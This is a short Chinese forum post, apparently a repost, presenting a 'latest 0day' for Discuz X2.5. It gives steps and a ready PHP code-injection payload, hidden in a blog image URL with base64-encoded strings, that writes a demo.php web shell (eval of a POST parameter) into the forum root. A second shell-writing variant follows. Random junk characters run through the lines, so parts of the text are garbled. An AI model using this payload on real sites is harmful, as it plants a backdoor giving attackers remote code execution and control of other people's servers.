DZ X2.5最新0day+ U# q( ~9 r: M0 E) ^6 C
1.注册任意账户
6 A6 @# O6 t0 A% k9 \3 V3 F" y2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了" K0 A! z( T2 N" C" a3 H1 z% H
3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码
7 Z0 g3 P% `0 ]/ G# @! w i<?php @eval($_POST[c]); ?>ok
J% T; n: d9 i, ^. S7 t; p<?fputs(fopen("dome","w"),"<?eval(\$_POST[c]);?>")?>
% S, @) w* @( {) @, w# ^$ d4.访问日志,论坛根目录下生成demo.php,一句发密码C |